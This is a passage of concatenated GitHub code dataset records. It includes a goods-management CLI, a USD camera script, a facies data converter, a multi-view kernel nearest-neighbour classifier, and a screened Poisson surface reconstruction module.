unittest.main()\n","repo_name":"dwang28/ilp_solver","sub_path":"testing/test_debug.py","file_name":"test_debug.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12709290979","text":"import sys\nfrom model import GoodsModel\nfrom bll import GoodsController\n\nclass GoodsView:\n def __init__(self):\n self.controller = GoodsController()\n def main(self):\n while True:\n self.__view_menu()\n self.__select_menu()\n def __view_menu(self):\n print(\"1键录入商品信息\")\n print(\"2键查看商品信息\")\n print(\"3键删除商品信息\")\n print(\"4键修改商品信息\")\n print(\"0键退出系统\")\n def __select_menu(self):\n data = int(input(\"请选择操作\"))\n if data == 1:\n self.__input_message()\n elif data == 2:\n self.__display_message()\n elif data == 3:\n self.__delete_message()\n elif data == 4:\n self.__update_message()\n elif data == 0 :\n print(\"已退出程序\")\n sys.exit()\n def __input_message(self):\n goodsmodel = GoodsModel()\n goodsmodel.name = input(\"输入商品名称:\")\n goodsmodel.price = input(\"输入商品价格:\")\n self.controller.add_goods(goodsmodel)\n def __display_message(self):\n for item in self.controller.goods_list:\n print(item)\n def __delete_message(self):\n goods_id = int(input(\"请输入要删除的商品ID:\"))\n if self.controller.remove_goods(goods_id):\n print(\"删除成功\")\n else:\n print(\"删除失败\")\n def __update_message(self):\n model = GoodsModel()\n model.goods_id = int(input(\"请输入要修改的商品ID:\"))\n model.name = input(\"请输入修改后的名称:\")\n model.price = int(input(\"请输入修改后的价格:\"))\n if self.controller.update_goods(model):\n print(\"修改成功\")\n else:\n print(\"修改失败\")","repo_name":"wangqiang91/python_study","sub_path":"month01/day13_advanced_python/student_info_manager_system/usl.py","file_name":"usl.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4349873881","text":"from pxr import Gf\nfrom pxr import Vt\nfrom pxr import Usd\nfrom pxr import UsdGeom\n\nstage = Usd.Stage.CreateInMemory()\nUsdGeom.SetStageUpAxis(stage, UsdGeom.Tokens.z)\ncamera = UsdGeom.Camera.Define(stage, \"/Camera\")\n\ncamera_prim = camera.GetPrim()\ncamera_prim.GetAttribute(\"focalLength\").Set(11)\nUsdGeom.XformCommonAPI(camera_prim).SetRotate((90, 0, 180))\nUsdGeom.XformCommonAPI(camera_prim).SetTranslate((0, 500, 100))\n\ncmin, cmax = camera_prim.GetAttribute(\"clippingRange\").Get()\nclipping_plane = camera_prim.GetAttribute(\"clippingPlanes\")\nvec = Gf.Vec4f([1, 0, 0, 1])\npln = Vt.Vec4fArray((0, 1, 0, 0))\nclipping_plane.Set(pln)\nprint(stage.GetRootLayer().ExportToString())\n","repo_name":"compas-dev/compas_usd","sub_path":"scripts/camera_with_clipping_plane.py","file_name":"camera_with_clipping_plane.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38176535111","text":"import os\nimport math\nimport time\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\n\n\n\n\ndef main():\n\tdatafile = 'data_probstic_08.txt'\n\tcore_depths, a1,a2,a3,cs = np.genfromtxt(datafile, usecols=(0,1,2,3,4), unpack=True)\n\n\n\tidx=0\n\t# write multinomial matrix\n\twith file('synth_core_prop_08.txt', 'wb') as outfile:\n\t\tfor x in range(core_depths.size):\n\t\t\tslc=[]\n\t\t\trev = x#-1-x\n\t\t\t# print 'a1[x],a2[x],a3[x],cs[x]',a1[x],a2[x],a3[x],cs[x]\n\t\t\tslc = np.append(slc, (a1[x],a2[x],a3[x],cs[x]))\n\t\t\tfacies_idx = np.argmax(slc)\n\t\t\tvector = np.zeros(4)\n\t\t\tvector[facies_idx] = 1\n\t\t\toutfile.write(('{0}\\t'.format(core_depths[rev])))\n\t\t\tfor y in range(4):\n\t\t\t\toutfile.write('{0}\\t'.format(vector[y]))\n\t\t\toutfile.write('\\n')\n\twith file('synth_core_vec_08.txt', 'wb') as outfile:\n\t\tfor x in range(core_depths.size):\n\t\t\tslc=[]\n\t\t\tslc = np.append(slc, (a1[x],a2[x],a3[x],cs[x]))\n\t\t\tfacies_idx = np.argmax(slc)\n\t\t\toutfile.write('{0}\\t{1}\\n'.format(core_depths[x],facies_idx+1))\n\t\n\t# data = np.loadtxt(\"synth_core.txt\")\n\t# core_depths = data[:,0]\n\t# print 'core_depths', core_depths\n\t# print 'core_depths.size',core_depths.size\n\t# core_data = data[:,1]\n\t# print 'core_data',core_data\n\t# pred_core = np.zeros((core_depths.size,4))\n\n\t# for n in range(0,core_depths.size):\n\t# \t\tif core_data[n] == 0.571:\n\t# \t\t\tpred_core[n,3] = 1 \n\t# \t\tif core_data[n] == 0.429:\n\t# \t\t\tpred_core[n,2] = 1 \n\t# \t\tif core_data[n] == 0.286:\n\t# \t\t\tpred_core[n,1] = 1 \n\t# \t\tif core_data[n] == 0.143:\n\t# \t\t\tpred_core[n,0] = 1 \n\n\t# print pred_core\n\n\t# pred_core_ = str(pred_core)\n\n\t# with file('testing.txt','wb') as outfile:\n\t# \toutfile.write ('')\n\n\t# with file('testing.txt','ab') as outfile:\n\t# \tfor x in range(0,core_depths.size):\n\t# \t\tfor y in range(0,4):\n\t# \t\t\tval = str(int(pred_core[x,y]))\n\t# \t\t\trev = -1-x\n\t# \t\t\tdepth_str = str(core_depths[rev])\n\t# \t\t\toutfile.write('{0}\\t{1}\\n'.format(depth_str, val))\n\nif __name__ == \"__main__\": main()\n\n#Need to load what is output by the RunModel\n","repo_name":"intelligentEarth/Bayesreef","sub_path":"Preliminary_Sampling2018/depth-based_likl/data/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"12677799031","text":"import sys\r\n\r\nimport numpy as np\r\nfrom scipy.linalg import fractional_matrix_power\r\nfrom scipy.sparse import csgraph\r\nfrom sklearn.base import BaseEstimator, ClassifierMixin\r\nfrom sklearn.neighbors import NearestNeighbors\r\nfrom sklearn.utils.validation import check_X_y, check_array, check_is_fitted\r\nfrom sklearn.utils.multiclass import unique_labels\r\nfrom sklearn.metrics.pairwise import pairwise_kernels\r\n\r\n\r\n# def Lap_M_computing(K_V_V): # 计算K(Vc,Vc)的拉普拉斯矩阵\r\n# D = np.diag(np.sum(K_V_V, axis=1))\r\n# L_D = D - K_V_V\r\n# d_temp = fractional_matrix_power(D, -0.5)\r\n# L_M = d_temp.dot(L_D).dot(d_temp)\r\n# return L_M\r\n\r\n\r\nclass HSIC_GHKNN(BaseEstimator, ClassifierMixin):\r\n def __init__(self, k_nn=2, lamda=0.5, gamma=0.5, beta=0.5, type='rbf', theta=1,\r\n show_bar=False):\r\n '''\r\n\r\n :param k_nn: k NearestNeighbors for each class\r\n :param lamda:\r\n :param gamma:\r\n :param beta:\r\n :param type:\r\n '''\r\n self.k_nn = k_nn\r\n self.lamda = lamda\r\n self.gamma = gamma\r\n self.beta = beta\r\n self.type = type\r\n self.theta = theta\r\n self.show_bar = show_bar\r\n\r\n def fit(self, X, y, multi_views=[[1, 1], [2, 2]]):\r\n # Check that X and y have correct shape\r\n X, y = check_X_y(X, y)\r\n # Store the classes seen during fit\r\n self.classes_ = unique_labels(y)\r\n self.C_ = len(self.classes_)\r\n self.X_ = X\r\n self.y_ = y\r\n self.temp_dict_ = {\r\n \"score_f\": None,\r\n \"test_X\": None,\r\n \"pred_y\": None\r\n }\r\n self.multi_views_ = multi_views\r\n self.V_ = len(self.multi_views_)\r\n\r\n self.n_features_in_ = X.shape[1]\r\n # Return the classifier\r\n return self\r\n\r\n def predict(self, X):\r\n # Check if fit has been called\r\n check_is_fitted(self, ['classes_', 'C_', 'X_', 'y_', 'temp_dict_'])\r\n # Input validation\r\n X = check_array(X)\r\n if self.n_features_in_ != X.shape[1]:\r\n raise ValueError(\"the number of features in predict() is different from the number of features in fit\")\r\n\r\n if (X == self.temp_dict_[\"test_X\"]).all():\r\n return self.temp_dict_[\"pred_y\"]\r\n n_test = X.shape[0]\r\n distance_s = np.zeros((n_test, self.C_))\r\n number_c = np.zeros((self.C_, 1))\r\n for i in range(self.C_):\r\n # print(np.argwhere(self.y == self.classes[i]).flatten())\r\n train_x_c = self.X_[np.argwhere(self.y_ == self.classes_[i]).flatten(), :]\r\n n_c = train_x_c.shape[0]\r\n number_c[i] = n_c\r\n\r\n if self.k_nn >= n_c:\r\n k_nn_i = n_c\r\n else:\r\n k_nn_i = self.k_nn\r\n # 调用sklearn的NearestNeighbors方法计算k近邻\r\n nbrs = NearestNeighbors(n_neighbors=k_nn_i, algorithm='auto').fit(train_x_c)\r\n indices = nbrs.kneighbors(X, return_distance=False)\r\n\r\n dim_k = k_nn_i\r\n matrics_H = np.eye(dim_k) - ((np.ones((dim_k, 1)).dot(np.ones((1, dim_k)))) / dim_k)\r\n\r\n round = 0\r\n for j in range(n_test):\r\n # 进度条显示\r\n if self.show_bar:\r\n print(\"\\r\", end=\"\")\r\n prct = int(((j + 1) / n_test) * 100)\r\n print(\"Class {}/{} , progress: {}/{} {}%: \".format(i + 1, self.C_, j + 1, n_test, prct),\r\n \"▋\" * (prct // 2), end=\"\")\r\n if j + 1 == n_test:\r\n print(\"\")\r\n sys.stdout.flush()\r\n\r\n K_Vc_Vc_V = np.zeros((dim_k, dim_k, self.V_)) # k * k * V\r\n K_Vc_x_V = np.zeros((dim_k, 1, self.V_)) # k*1 * V\r\n L_M_V = np.zeros((dim_k, dim_k, self.V_)) # k * k * V\r\n K_x_x_V = np.zeros((1, self.V_)) # 1 * V\r\n alpha_V = np.zeros((dim_k, 1, self.V_)) # k*1 * V\r\n\r\n for v in range(self.V_):\r\n # N个近邻样本\r\n N_x_v = train_x_c[indices[j], (self.multi_views_[v][0] - 1):self.multi_views_[v][1]]\r\n # 计算每一列的均值作为最终均值\r\n N_mu_v = np.mean(N_x_v, axis=0)\r\n Vc_v = N_x_v - N_mu_v # 自动触发numpy广播\r\n K_Vc_Vc_v = pairwise_kernels(Vc_v, Vc_v, metric=self.type, gamma=self.gamma, filter_params=True)\r\n nc_x_v = (X[j, (self.multi_views_[v][0] - 1):self.multi_views_[v][1]] - N_mu_v).reshape(1, -1)\r\n K_Vc_x_v = pairwise_kernels(Vc_v, nc_x_v, metric=self.type, gamma=self.gamma, filter_params=True)\r\n L_M_v, d = csgraph.laplacian(K_Vc_Vc_v, return_diag=True, normed=True)\r\n K_x_x_v = pairwise_kernels(nc_x_v, nc_x_v, metric=self.type, gamma=self.gamma, filter_params=True)\r\n\r\n K_Vc_Vc_V[:, :, v] = K_Vc_Vc_v\r\n K_Vc_x_V[:, :, v] = K_Vc_x_v\r\n L_M_V[:, :, v] = L_M_v\r\n K_x_x_V[:, v] = K_x_x_v\r\n for v in range(self.V_): # 第v视角\r\n alpha_v = np.linalg.inv(\r\n K_Vc_Vc_V[:, :, v] + self.lamda * np.identity(dim_k) + self.beta * L_M_V[:, :, v]).dot(\r\n K_Vc_x_V[:, :, v])\r\n alpha_V[:, :, v] = alpha_v\r\n # 开始迭代\r\n round = 1\r\n while 1:\r\n last_alpha_V = np.array(alpha_V)\r\n matric_GAMMA = np.zeros((dim_k, dim_k)) # 辅助计算GAMMA_v的总和矩阵\r\n matric_GAMMA_V = np.zeros((dim_k, dim_k, self.V_)) # 辅助计算GAMMA_v的单个矩阵\r\n for v in range(self.V_): # 第v视角\r\n matric_GAMMA_v = matrics_H.dot(alpha_V[:, :, v]).dot(alpha_V[:, :, v].T).dot(\r\n matrics_H) # 未求和前的GAMMA矩阵每一项\r\n matric_GAMMA_V[:, :, v] = matric_GAMMA_v # 暂存以减少计算开销\r\n matric_GAMMA = np.sum(matric_GAMMA_V, 2) # 所有GAMMA矩阵每一项之和\r\n\r\n # 更新alpha_V\r\n for v in range(self.V_):\r\n GAMMA_v = matric_GAMMA - matric_GAMMA_V[:, :, v] # GAMMA_v, 由总和减去单个而得\r\n alpha_v = np.linalg.inv(\r\n K_Vc_Vc_V[:, :, v] + self.lamda * np.identity(dim_k) +\r\n self.beta * L_M_V[:, :, v] + self.theta * GAMMA_v) \\\r\n .dot(K_Vc_x_V[:, :, v])\r\n alpha_V[:, :, v] = alpha_v\r\n if (round != 1 and np.linalg.norm(last_alpha_V - alpha_V) < 0.01 * np.linalg.norm(last_alpha_V)) \\\r\n or round >= 5:\r\n #print(round)\r\n break\r\n round += 1\r\n\r\n dis_V = np.zeros((1, self.V_))\r\n for v in range(self.V_):\r\n dis_V[:, v] = np.real(np.sqrt(K_x_x_V[:, v]\r\n - 2 * K_Vc_x_V[:, :, v].T.dot(alpha_V[:, :, v])\r\n + alpha_V[:, :, v].T.dot(K_Vc_Vc_V[:, :, v]).dot(alpha_V[:, :, v])))\r\n distance_s[j, i] = np.mean(dis_V)\r\n\r\n y_pred = self.classes_[distance_s.argmin(1)]\r\n sum_s = np.sum(distance_s, axis=1).reshape(-1, 1) - distance_s\r\n with np.errstate(divide='ignore', invalid='ignore'):\r\n score_f = sum_s / np.sum(sum_s, axis=1).reshape(-1, 1)\r\n\r\n self.temp_dict_[\"score_f\"] = score_f\r\n # noinspection PyTypedDict\r\n self.temp_dict_[\"test_X\"] = X\r\n self.temp_dict_[\"pred_y\"] = y_pred\r\n\r\n return y_pred\r\n\r\n def predict_proba(self, X):\r\n # Check if fit has been called\r\n check_is_fitted(self, ['classes_', 'C_', 'X_', 'y_', 'temp_dict_'])\r\n # Input validation\r\n X = check_array(X)\r\n if self.n_features_in_ != X.shape[1]:\r\n raise ValueError(\r\n \"the number of features in predict_proba() is different from the number of features in fit\")\r\n if (X == self.temp_dict_[\"test_X\"]).all():\r\n return self.temp_dict_[\"score_f\"]\r\n else:\r\n self.predict(X)\r\n return self.temp_dict_[\"score_f\"]\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from sklearn.utils.estimator_checks import check_estimator\r\n\r\n check_estimator(HSIC_GHKNN())\r\n","repo_name":"ferryvan/HSIC_GHKNN","sub_path":"HSIC_GHKNN.py","file_name":"HSIC_GHKNN.py","file_ext":"py","file_size_in_byte":8670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25975555909","text":"from typing import Union\n\nimport jittor as jt\nimport torch\nimport torch_scatter\nimport numpy as np\nfrom jspsr.core.hashtree import HashTree, VoxelStatus\nfrom jspsr.bases.abc import BaseBasis\nfrom jspsr.core.ops import screened_multiplication, marching_cubes_op, marching_cubes, torch_unique\nfrom jspsr.ext import CuckooHashTable\nfrom jspsr.core.solver import solve_sparse\n\n\nclass ScreeningData:\n \"\"\"\n Sparse matrix representation (Num-pts x Num-vx)\n \"\"\"\n def __init__(self, pts_ids, vx_ids, values, nb_sizes):\n self.pts_ids = pts_ids\n self.vx_ids = vx_ids\n self.values = values\n self.nb_sizes = nb_sizes\n\n\nclass Reconstructor:\n def __init__(self, hash_tree: HashTree, basis: BaseBasis, feat: dict = None):\n \"\"\"\n Screened Poisson reconstructor class.\n :param hash_tree: The tree containing the octree structure as well as input points\n :param basis: basis function to use\n :param feat: dict that maps from integer depth to torch features, used only when basis needs features.\n \"\"\"\n self.hash_tree = hash_tree\n self.fixed_level_set = None\n self.branch = hash_tree.DECODER\n\n self.basis = basis\n self.solutions = {}\n self.sample_weight = None\n\n # Initialize basis feature if not provided.\n if feat is None:\n feat = {}\n for d in range(hash_tree.depth):\n feat[d] = torch.zeros(\n (hash_tree.get_coords_size(self.branch, d),\n basis.get_feature_size()), device=hash_tree.device)\n basis.initialize_feature_value(feat[d])\n self.grid_features = feat\n\n def set_fixed_level_set(self, value):\n \"\"\"\n Originally level set is determined by computing mean(chi(input)), this function allows you to\n manually specify that\n :param value: level set value\n \"\"\"\n self.fixed_level_set = value\n\n @classmethod\n def _evaluate_screening_term(cls, data_a: ScreeningData, data_b: ScreeningData,\n domain_a, domain_b, pts_weight=None):\n if domain_a.size(0) == 0 or domain_b.size(0) == 0:\n return torch.zeros((0, ), device=domain_a.device)\n\n if pts_weight is None:\n pts_weight = torch.ones((data_a.nb_sizes.size(0), ), device=domain_a.device)\n elif isinstance(pts_weight, float):\n pts_weight = torch.full((data_a.nb_sizes.size(0), ), fill_value=pts_weight, dtype=torch.float32,\n device=domain_a.device)\n\n domain_table = CuckooHashTable(torch.stack([domain_a, domain_b], dim=1), enlarged=True)\n term_res = screened_multiplication(domain_table.object,\n data_a.values, data_b.values,\n data_a.vx_ids, data_b.vx_ids,\n data_a.nb_sizes, data_b.nb_sizes, pts_weight)\n\n return term_res\n\n def solve_multigrid(self, start_depth, end_depth, normal_data: dict,\n screen_alpha: Union[float, torch.Tensor] = 0.0, screen_xyz: torch.Tensor = None,\n screen_delta: Union[float, torch.Tensor] = 0.1,\n solver: str = \"pcg\", verbose: bool = True):\n \"\"\"\n Build and solve the linear system L alpha = d, using our coarse-to-fine solver.\n Note that the full V-cycle is not supported in this repo. Normal is however not smoothed\n because empirically we've found no difference.\n The energy function defined in our paper is solver within a truncated domain, with\n explicit dirichlet constraints that the boundary evaluates to 0. We choose not to eliminate\n such constraints because that will introduce many heterogeneous integral computations on\n the boundary.\n :param start_depth: int, the coarsest level for the solver\n :param end_depth: int, the finest level for the solver\n :param normal_data: dictionary that maps from depth to splatted normal data (x, 3)\n :param screen_alpha: float or Tensor. Weight of the screening term\n :param screen_xyz: None or Tensor. positional constraints to the system.\n :param screen_delta: float or Tensor. Target scalar value as described in the paper.\n :param solver: you can choose from 'cholmod' or 'pcg' or 'mixed'.\n :param verbose: Output debug information during solve.\n \"\"\"\n if isinstance(screen_alpha, torch.Tensor):\n assert screen_xyz is not None, \"Must provide points to be screened.\"\n assert screen_alpha.size(0) == screen_xyz.size(0)\n should_screen = True\n else:\n should_screen = screen_alpha > 0.0\n\n self.solutions = {}\n neighbour_range = 2 * self.basis.get_domain_range() - 1\n\n # Basis pre-evaluation for screening term.\n screen_data = {}\n if should_screen:\n base_coords = screen_xyz / self.hash_tree.voxel_size - 0.5\n for d in range(end_depth, start_depth + 1):\n pts_ids, vx_ids, tgt_offsets, nb_sizes = self.hash_tree.get_neighbours_data(\n base_coords, 1, d, self.hash_tree.get_range_kernel(self.basis.get_domain_range()),\n self.branch, transposed=True)\n query_coords = -tgt_offsets / self.hash_tree.get_stride(self.branch, d)\n query_val = self.basis.evaluate(feat=self.grid_features[d], xyz=query_coords, feat_ids=vx_ids)\n screen_data[d] = ScreeningData(pts_ids, vx_ids, query_val, nb_sizes)\n\n for d in range(start_depth, end_depth - 1, -1):\n screen_factor = (1 / 4.) ** d\n\n # Build RHS:\n rhs_val = 0\n for data_depth, depth_normal_data in normal_data.items():\n normal_ids, tree_ids, normal_offset, _ = self.hash_tree.get_neighbours(\n data_depth, d,\n self.basis.get_domain_range(),\n self.branch)\n partial_sums = self.basis.integrate_const_deriv_product(\n data=-depth_normal_data[normal_ids],\n target_feat=self.grid_features[d],\n rel_pos=normal_offset,\n data_stride=self.hash_tree.get_stride(self.branch, data_depth),\n target_stride=self.hash_tree.get_stride(self.branch, d),\n target_ids=tree_ids\n )\n rhs_val += torch_scatter.scatter_add(\n partial_sums, tree_ids, dim=0, dim_size=self.hash_tree.get_coords_size(self.branch, d))\n\n if should_screen:\n if isinstance(screen_alpha, torch.Tensor) or isinstance(screen_delta, torch.Tensor):\n mult = (screen_delta * screen_alpha)[screen_data[d].pts_ids]\n else:\n mult = screen_alpha * screen_delta\n rhs_val += screen_factor * torch_scatter.scatter_sum(\n screen_data[d].values * mult,\n screen_data[d].vx_ids, dim_size=self.hash_tree.get_coords_size(self.branch, d)\n )\n\n # Correction:\n for dd in range(start_depth, d, -1):\n src_ids, tgt_ids, rel_pos, _ = self.hash_tree.get_neighbours(\n d, dd, target_range=neighbour_range, branch=self.branch)\n a_d_dd_val = self.basis.integrate_deriv_deriv_product(\n source_feat=self.grid_features[d],\n target_feat=self.grid_features[dd],\n rel_pos=rel_pos,\n source_stride=self.hash_tree.get_stride(self.branch, d),\n target_stride=self.hash_tree.get_stride(self.branch, dd),\n source_ids=src_ids, target_ids=tgt_ids)\n if should_screen:\n a_d_dd_val = a_d_dd_val + screen_factor * self._evaluate_screening_term(\n screen_data[d], screen_data[dd], src_ids, tgt_ids, screen_alpha)\n rhs_val -= torch_scatter.scatter_sum(self.solutions[dd][tgt_ids] * a_d_dd_val,\n src_ids, dim_size=rhs_val.size(0))\n\n # Build LHS:\n src_ids, tgt_ids, rel_pos, _ = self.hash_tree.get_neighbours(d, d, target_range=neighbour_range,\n branch=self.branch)\n lhs_val = self.basis.integrate_deriv_deriv_product(\n source_feat=self.grid_features[d],\n target_feat=self.grid_features[d],\n rel_pos=rel_pos,\n source_stride=self.hash_tree.get_stride(self.branch, d),\n target_stride=self.hash_tree.get_stride(self.branch, d),\n source_ids=src_ids, target_ids=tgt_ids)\n\n if should_screen:\n lhs_val = lhs_val + screen_factor * self._evaluate_screening_term(\n screen_data[d], screen_data[d], src_ids, tgt_ids, screen_alpha)\n\n if solver == \"mixed\":\n cur_solver = \"mixed\" if d == end_depth else \"cholmod\"\n else:\n cur_solver = solver\n self.solutions[d] = solve_sparse(src_ids, tgt_ids, lhs_val, rhs_val, cur_solver)\n\n # Dump residual for comparison\n if verbose:\n residual = torch_scatter.scatter_sum(self.solutions[d][tgt_ids] * lhs_val, src_ids,\n dim_size=rhs_val.size(0)) - rhs_val\n print(f\"Solving complete at level {d}, residual = {torch.linalg.norm(residual).item()}.\")\n\n def evaluate_raw_chi(self, xyz: torch.Tensor, compute_mask: bool = False,\n compute_grad: bool = False, depths: list = None):\n \"\"\"\n Evaluate the chi value at (x,y,z)\n :param depths: visualize only the depth in the list, default is None\n :param compute_grad: whether to compute gradient of the field\n :param xyz: torch.Tensor (N x 3). metric-space positions\n :param compute_mask: bool for debugging purpose\n :return: (N,) chi value.\n \"\"\"\n assert len(self.solutions) > 0, \"Please run solver before evaluation.\"\n\n sdf_vals = 0\n sdf_mask = torch.zeros((xyz.size(0), ), dtype=bool, device=xyz.device) if compute_mask else None\n for level_d, level_solution in self.solutions.items():\n if depths is not None and level_d not in depths:\n continue\n\n sdf_val = self.hash_tree.evaluate_interpolated(\n xyz, self.basis, self.grid_features[level_d], level_d, level_solution,\n compute_mask, compute_grad=compute_grad)\n if compute_mask:\n sdf_vals += sdf_val[0]\n sdf_mask = torch.logical_or(sdf_mask, sdf_val[1])\n else:\n sdf_vals += sdf_val\n\n if compute_mask:\n return sdf_vals, sdf_mask\n return sdf_vals\n\n def get_mean_chi(self):\n if self.fixed_level_set is not None:\n return self.fixed_level_set\n sdf_surface = self.evaluate_raw_chi(self.hash_tree.xyz)\n if self.sample_weight is None:\n print(\"Warning: Sample weight not set.\")\n return torch.mean(sdf_surface)\n else:\n return torch.sum(sdf_surface * self.sample_weight) / torch.sum(self.sample_weight)\n\n def evaluate_chi(self, xyz: torch.Tensor, compute_mask: bool = False, max_points: int = -1, depths: list = None):\n \"\"\"\n Evaluate the implicit field value, possibly with chunking\n \"\"\"\n mean_chi = self.get_mean_chi()\n\n n_chunks = int(np.ceil(xyz.size(0) / max_points)) if max_points > 0 else 1\n xyz_chunks = torch.chunk(xyz, n_chunks)\n sdf_val_chunks = []\n\n for xyz in xyz_chunks:\n sdf_val = self.evaluate_raw_chi(xyz, compute_mask=compute_mask, depths=depths)\n sdf_val_chunks.append(sdf_val)\n\n if compute_mask:\n return torch.cat([t[0] for t in sdf_val_chunks]) - mean_chi, torch.cat([t[1] for t in sdf_val_chunks])\n\n return torch.cat(sdf_val_chunks) - mean_chi\n\n def extract_mesh(self, base_coords: torch.Tensor, chi_field: torch.Tensor, chi_depth: int, build_o3d_mesh: bool = True):\n \"\"\"\n Extract mesh at a specific depth, given densely-evaluated implicit function values.\n :param base_coords: coordinates of the evaluation point\n :param chi_field: sampled implicit function values\n :param chi_depth: int, depth of the mesh extraction\n :param build_o3d_mesh: whether to use Open3D to build TriangleMesh\n :return: o3d.geometry.TriangleMesh or (vertices Vx3, triangles Tx3, normals Vx3)\n \"\"\"\n scale = self.hash_tree.get_stride(self.branch, chi_depth)\n\n # Extract mesh.\n num_lif = base_coords.size(0)\n chi_resolution = chi_field.size(0) // num_lif\n chi_resolution = round(chi_resolution ** (1 / 3.))\n\n chi_field = chi_field.reshape(-1, chi_resolution, chi_resolution, chi_resolution)\n vertices, triangles, normals, _ = marching_cubes_op(\n base_coords.float() / scale, chi_field\n )\n vertices = vertices * (scale * self.hash_tree.voxel_size)\n\n if build_o3d_mesh:\n import open3d as o3d\n\n vertices = vertices.cpu().numpy().astype(float)\n triangles = triangles.cpu().numpy().astype(np.int32)\n normals = normals.cpu().numpy().astype(float)\n\n final_mesh = o3d.geometry.TriangleMesh()\n final_mesh.vertices = o3d.utility.Vector3dVector(vertices)\n final_mesh.vertex_normals = o3d.utility.Vector3dVector(normals)\n final_mesh.triangles = o3d.utility.Vector3iVector(triangles)\n\n return final_mesh\n\n else:\n return vertices, triangles, normals\n\n def extract_multiscale_mesh(self, n_upsample: int = 1, max_depth: int = 100, expand: int = 0, trim: bool = False,\n build_o3d_mesh: bool = True, max_points: int = -1):\n \"\"\"\n https://www.cs.rice.edu/~jwarren/papers/dmc.pdf\n (Possible extensions: Use hermite data to compute feature locations & Manifold dual marching cubes)\n :param n_upsample: samples within each primal grid.\n :param max_depth: maximum depth to extract\n :param expand: size of expansion for the tree, set to 3 to guarantee no information is lost.\n :param trim: whether to keep only leaf voxels\n :param build_o3d_mesh: bool whether to build Open3D mesh.\n :param max_points: int, maximum number of points.\n :return: (vertex, triangle) tuple or o3d.geometry.TriangleMesh\n \"\"\"\n max_depth = min(max_depth, self.hash_tree.depth)\n\n # Make tree\n conformal_primal_base = {}\n\n if trim:\n for d in range(max_depth):\n base_coords = self.hash_tree.get_coords(self.branch, d)\n coords_status = self.hash_tree.evaluate_voxel_status(self.branch, base_coords, d)\n conformal_primal_base[d] = base_coords[coords_status == VoxelStatus.VS_EXIST_STOP.value]\n else:\n # Make conformal tree (from fine to coarse) and filter all leaves\n conformal_mask = {}\n for d in range(max_depth):\n _, base_coords = self.hash_tree.get_test_grid(0, d, expand, conforming=d < max_depth - 1)\n # Keep only leaf nodes (by inspecting whether it has children)\n # Mask has to be applied next round, because the pruning of parents still need a full structure.\n if d > 0:\n children_table = CuckooHashTable(data=conformal_primal_base[d - 1])\n ol_mask = children_table.query(base_coords) == -1\n # No more nodes exist (including this layer)\n if not torch.any(ol_mask):\n max_depth = d\n break\n conformal_mask[d] = ol_mask\n conformal_primal_base[d] = base_coords\n for d in range(1, max_depth):\n conformal_primal_base[d] = conformal_primal_base[d][conformal_mask[d]]\n\n # Expand with the sample factor (build primal grids)\n expand_voxel_size = self.hash_tree.voxel_size / n_upsample\n expand_coords = torch.arange(0, n_upsample, dtype=torch.int, device=self.hash_tree.device)\n expand_coords = torch.stack(torch.meshgrid(expand_coords, expand_coords, expand_coords, indexing='ij'), dim=3)\n expand_coords = expand_coords.view(-1, 3)\n expand_primal_base = {}\n for d in range(max_depth):\n scale = self.hash_tree.get_stride(self.branch, d)\n b_d = conformal_primal_base[d] * n_upsample\n b_d = (b_d.unsqueeze(1) + (expand_coords * scale).unsqueeze(0)).view(-1, 3)\n expand_primal_base[d] = b_d # (N * n_upsample ** 3, 3)\n\n # Identify dual grids (iterate 8 corners of primal voxels)\n dual_centers = []\n for d in range(max_depth):\n scale = self.hash_tree.get_stride(self.branch, d)\n for offset in [(0, 0, 0), (0, 0, 1), (0, 1, 0), (0, 1, 1), (1, 0, 0), (1, 0, 1), (1, 1, 0), (1, 1, 1)]:\n dual_centers.append(expand_primal_base[d] + torch.tensor(\n offset, dtype=torch.int32, device=self.hash_tree.device) * scale)\n dual_centers = torch.cat(dual_centers, 0)\n dual_centers = torch_unique(dual_centers, dim=0) # (DC, 4)\n\n # Populate the filter incomplete dual grids. (DC, 8, 2 = depth + inds)\n dual_centers_table = CuckooHashTable(data=dual_centers)\n acc_inds, acc_inds_count = marching_cubes.dual_marching_cubes_indices(\n dual_centers_table.object, expand_primal_base,\n {d: self.hash_tree.get_stride(self.branch, d) for d in range(max_depth)},\n {d: sum([expand_primal_base[dd].size(0) for dd in range(d)]) for d in range(max_depth)})\n acc_inds = acc_inds[acc_inds_count == 8]\n\n # Obtain dual corners (we assume to be primal centers) and evaluate them\n dual_corners = []\n dual_values = []\n for d in range(max_depth):\n dc_coords = (expand_primal_base[d] + self.hash_tree.get_stride(self.branch, d)) * expand_voxel_size\n dual_corners.append(dc_coords)\n dual_values.append(self.evaluate_chi(dc_coords, max_points=max_points))\n dual_corners = torch.cat(dual_corners, 0)\n dual_values = torch.cat(dual_values, 0)\n\n # Marching cubes on dual grids.\n tris, vert_ids = marching_cubes.dual_marching_cubes_sparse(acc_inds, dual_corners, dual_values)\n unq, triangles = torch_unique(vert_ids.view(-1, 2), dim=0, return_inverse=True)\n vertices = torch.empty((unq.size(0), 3), device=vert_ids.device)\n vertices[triangles] = tris.view(-1, 3)\n triangles = triangles.view(-1, 3)\n\n if build_o3d_mesh:\n import open3d as o3d\n\n vertices = vertices.cpu().numpy().astype(float)\n triangles = triangles.cpu().numpy().astype(np.int32)\n\n final_mesh = o3d.geometry.TriangleMesh()\n final_mesh.vertices = o3d.utility.Vector3dVector(vertices)\n final_mesh.triangles = o3d.utility.Vector3iVector(triangles)\n\n return final_mesh\n else:\n return vertices, 